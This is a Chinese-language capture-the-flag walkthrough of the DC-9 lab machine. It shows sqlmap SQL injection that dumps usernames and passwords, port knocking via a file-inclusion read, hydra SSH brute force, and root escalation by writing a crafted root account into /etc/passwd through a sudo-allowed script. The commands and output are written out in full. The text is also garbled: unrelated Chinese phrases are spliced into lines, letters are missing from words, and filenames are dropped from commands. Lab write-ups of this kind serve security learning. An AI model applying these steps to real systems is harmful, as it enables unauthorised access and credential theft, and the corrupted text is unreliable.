渗透测试:靶机DC-9练习实录DC-9打靶记录
⼀、信息收集
# arp-scan -l
# nmap -A -p- 10.0.0.28
# 结果没什么有意思的事⼉,也就不复制到这⾥啦。
⼆、BurpSuite扫描发现有SQL注⼊漏洞
三、接下来⽤SQLmap
在BurpSuite中找到results.php页⾯,然后在Request部分右键->Copy to file,存贮为⼀个txt⽂件()接下来就可以⽤sqlmap了。
┌──(root kali)-[~/game/dc-9]
└─# sqlmap - --dbs
# 结果很多,有⽤的就这⼏⾏
available databas [3]:
[*] information_schema
[*] Staff
[*] urs
# 先搞下Staff
┌──(root kali)-[~/game/dc-9]
快乐的近义词是什么└─# sqlmap - -D Staff --tables
[03:15:06] [INFO] fetching tables for databa: 'Staff'
Databa: Staff
[2 tables]
+--------------+
| StaffDetails |
| Urs |
+--------------+
┌──(root kali)-[~/game/dc-9]
└─# sqlmap - -D Staff -T Urs --columns
[03:17:01] [INFO] fetching columns for table 'Urs' in databa 'Staff'
Databa: Staff
Table: Urs
[3 columns]
+----------+-----------------+
| Column | Type |
+----------+-----------------+
| Password | varchar(255) |
| UrID | int(6) unsigned |
| Urname | varchar(255) |
+----------+-----------------+
┌──(root kali)-[~/game/dc-9]
└─# sqlmap - -D Staff -T Urs -C Urname,Password --dump
# 这⾥⼀定要注意Urname,Password之间不能有空格
Databa: Staff
Table: Urs
[1 entry]
+----------+----------------------------------+
| Urname | Password |
+----------+----------------------------------+
| admin | 856f5de590ef37314e7c3bdf6f8a66dc |
+----------+----------------------------------+
# ⽹上md5解密:transorbital1
# 有很多⽹站:/
# 经过测试可以登录⽹站后台,可似乎也没能发现什么。那再搞⼀下urs库
┌──(root kali)-[~/game/dc-9]
└─# sqlmap - -D urs --tables
[03:29:21] [INFO] fetching tables for databa: 'urs'
Databa: urs
[1 table]
+-------------+
| UrDetails |
+-------------+
┌──(root kali)-[~/game/dc-9]
└─# sqlmap - -D urs -T UrDetails --columns
[04:08:41] [INFO] fetching columns for table 'UrDetails' in databa 'urs'
Databa: urs
Table: UrDetails
[6 columns]
+-----------+-----------------+
| Column | Type |
+-----------+-----------------+
| firstname | varchar(30) |
| id | int(6) unsigned |
| lastname | varchar(30) |
| password | varchar(20) |
| reg_date | timestamp |
| urname | varchar(30) |
+-----------+-----------------+
┌──(root kali)-[~/game/dc-9]
└─# sqlmap - -D urs -T UrDetails -C urname,password --dump
+-----------+---------------+
| urname | password |
+-----------+---------------+
| marym | 3kfs86sfd |
| julied | 468sfdfsd2 |
| fredf | 4sfd87sfd1 |
| barneyr | RocksOff |
归田园居其一| tomc | TC&TheBoyz |
| jerrym | B8m#48sd |
| wilmaf | Pebbles |
| bettyr | BamBam01 |
| chandlerb | UrAG0D! |
| joeyt | Passw0rd |
| rachelg | yN72#dsd |
| rossg | ILoveRachel |
| monicag | 3248dsds7s |
销售工作计划范文| phoebeb | smellycats |
| scoots | YR3BVxxxw87 |
| janitor | Ilovepeepee |
| janitor2 | Hawaii-Five-0 |
棒棒糖儿歌
+-----------+---------------+
# 虽然搞出来不少东西,但不知道怎么⽤。SSH好像也被过滤了。
四、重新回到⽹站,仔细寻找
根据底部的信息File does not exist,可以推断,有可能存在⽂件包含漏洞。经过百度,可以知道有个敲门打开SSH端⼝的事情。(这个⼜是个新东西)
通过查看../../../../f⽂件,结合搜索到的相关知识,知道⽤nc分别去尝试这三个端⼝可以打开SSH端⼝
┌──(root kali)-[~/game/dc-9]易经怎么学
└─# nc 10.0.0.28 7469
(UNKNOWN) [10.0.0.28] 7469 (?) : Connection refud
┌──(root kali)-[~/game/dc-9]
└─# nc 10.0.0.28 8475 (UNKNOWN) [10.0.0.28] 8475 (?) : Connection refud
┌──(root kali)-[~/game/dc-9]
└─# nc 10.0.0.28 9842 (UNKNOWN) [10.0.0.28] 9842 (?) : Connection refud
┌──(root kali)-[~/game/dc-9]
└─# nmap -A -p- 10.0.0.28
Starting Nmap 7.91 ( nmap ) at 2021-08-31 04:04 EDT
Nmap scan report for 10.0.0.28
Host is up (0.00026s latency).
Not shown: 65533 clod ports
PORT STATE SERVICE VERSION在家怎么做奶茶
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 a2:b3:38:74:32:74:0b:c5:16:dc:13:de:cb:9b:8a:c3 (RSA)
| 256 06:5c:93:87:15:54:68:6b:88:91:55:cf:f8:9a:ce:40 (ECDSA)
|_ 256 e4:2c:88:da:88:63:26:8c:93:d5:f7:63:2b:a3:eb:ab (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
接下来就可以利⽤找出来的⼀堆⽤户名和密码了。分别将这些东西保存到两个⽂件中:ur.txt和中。这时候VIM中的块操作能省不少时间。甚⾄可以考虑⽤⼀下linux中的三个神器:d grep gawk。可惜还不会⽤。保存好后,就可以请出hydra了。注意:⼀个⽤户名⼀⾏,⼀个密码⼀⾏,⽤户名和密码分别存两个不同的⽂件。
┌──(root kali)-[~/game/dc-9]
└─# hydra - - 10.0.0.28 ssh
Hydra v9.1 (c) 2020 by van Haur/THC & David Maciejak - Plea do not u in military or cret rvice organizations, or for illegal purpos (this is non-binding, the *** ignore laws and ethics anyway). Hydra (/vanhaur-thc/thc-hydra) starting at 2021-08-31 04:04:48
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: u -t 4
[DATA] max 16 tasks per 1 rver, overall 16 tasks, 289 login tries (l:17/p:17), ~19 tries per task
[DATA] attacking ssh://10.0.0.28:22/
[22][ssh] host: 10.0.0.28 login: chandlerb password: UrAG0D!
[22][ssh] host: 10.0.0.28 login: joeyt password: Passw0rd
[22][ssh] host: 10.0.0.28 login: janitor password: Ilovepeepee
1 of 1 target successfully completed, 3 valid passwords found
# 真是越玩越觉得神奇,这些linux命令的简洁⾼效在这⾥得到了完美的体现。
五、到这⾥就可以愉快地SSH进⽬标主机了
# 原来我⾼兴的太早了,这三个⽤户家⽬录下什么也没有。ls后什么也显⽰不出来。后来,上⽹搜索后才发现他的⽂件加上了隐藏属性。最基本的⼀些东西,我给忘掉了。
janitor@dc-9:~$ ls -al
total 20
drwx------ 4 janitor janitor 4096 Aug 31 18:38 .
drwxr-xr-x 19 root root 4096 Dec 29 2019 ..
lrwxrwxrwx 1 janitor janitor 9 Dec 29 2019 .bash_history -> /dev/null
drwx------ 3 janitor janitor 4096 Aug 31 18:05 .gnupg
drwx------ 2 janitor janitor 4096 Dec 29 2019 .crets-for-putin
-rw-r--r-- 1 janitor janitor 6 Aug 31 18:
janitor@dc-9:~$ cd .crets-for-putin/
janitor@dc-9:~/.crets-for-putin$ ls
<
janitor@dc-9:~/.crets-for-putin$
BamBam01
Passw0rd
姊妹俩smellycats
P0Lic#10-4
B4-Tru3-001
4uGU5T-NiGHts
#将上述⼏个密码加⼊到上⾯的中,再次运⾏hydra
┌──(root kali)-[~/game/dc-9]
└─# hydra - - 10.0.0.28 ssh
Hydra v9.1 (c) 2020 by van Haur/THC & David Maciejak - Plea do not u in military or cret s
ervice organizations, or for illegal purpos (this is non-binding, the *** ignore laws and ethics anyway). Hydra (/vanhaur-thc/thc-hydra) starting at 2021-08-31 04:50:16
[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: u -t 4
[DATA] max 16 tasks per 1 rver, overall 16 tasks, 391 login tries (l:17/p:23), ~25 tries per task
[DATA] attacking ssh://10.0.0.28:22/
[22][ssh] host: 10.0.0.28 login: fredf password: B4-Tru3-001
[22][ssh] host: 10.0.0.28 login: joeyt password: Passw0rd
[STATUS] 356.00 tries/min, 356 tries in 00:01h, 40 to do in 00:01h, 16 active
1 of 1 target successfully completed,
2 valid passwords found
Hydra (/vanhaur-thc/thc-hydra) finished at 2021-08-31 04:51:26
# ⼜可以发现⼀个账户fredf
fredf@dc-9:/home/janitor/.crets-for-putin$ cd ~
fredf@dc-9:~$ sudo -l
Matching Defaults entries for fredf on dc-9:
env_ret, mail_badpass,
cure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
Ur fredf may run the following commands on dc-9:
(root) NOPASSWD: /opt/devstuff/dist/test/test
# ⽤fredf账户登录后,可以发现他具有⼀个特殊权限,可以运⾏⼀个test脚本。
fredf@dc-9:~$ /opt/devstuff/dist/test/test --help
Usage: python test.py read append凉拌粉丝
fredf@dc-9:~$
# 这个test的作⽤就是把⼀个⽂件中的内容append到另⼀个⽂件中。我们⾸先想到利⽤test往passwd⽂件中写⼊⽤户信息,便这个⽤户⼝令必须是加密过的。必须按以下⽅式处理后写⼊后才有效。fredf@dc-9:~$ openssl passwd -1 -salt xl zylee
$1$xl$Qr4AkYPDjDkVDlixUxrcZ.
fredf@dc-9:~$ echo 'xl:$1$xl$Qr4AkYPDjDkVDlixUxrcZ.:0:0::/root:/bin/bash'>/tmp/xl
fredf@dc-9:~$ sudo /opt/devstuff/dist/test/test /tmp/xl /etc/passwd
fredf@dc-9:~$ su xl
Password:
root@dc-9:/home/fredf# cd /root
root@dc-9:~# ls
<
root@dc-9:~#
███╗██╗██╗██████╗███████╗██╗██╗██████╗██████╗██╗██╗██╗██╗██╗
████╗██║██║██╔════╝██╔════╝██║██║██╔═══██╗██╔══██╗██║██╔╝██║██║██║
██╔██╗██║██║██║█████╗██║█╗██║██║██║██████╔╝█████╔╝██║██║██║
██║╚██╗██║██║██║██╔══╝██║███╗██║██║██║██╔══██╗██╔═██╗╚═╝╚═╝╚═╝
██║╚████║██║╚██████╗███████╗╚███╔███╔╝╚██████╔╝██║██║██║██╗██╗██╗██╗
╚═╝╚═══╝╚═╝╚═════╝╚══════╝╚══╝╚══╝╚═════╝╚═╝╚═╝╚═╝╚═╝╚═╝╚═╝╚═╝
Congratulations - you have done well to get to this point.
Hope you enjoyed DC-9. Just wanted to nd out a big thanks to all tho
who have taken the time to complete the various DC challenges.
I also want to nd out a big thank you to the various members of @m0tl3ycr3w .
They are an inspirational bunch of fellows.
Sure, they might smell a bit, just kidding. :-)
Sadly, all things must come to an end, and this will be the last ever
challenge in the DC ries.
So long, and thanks for all the fish.
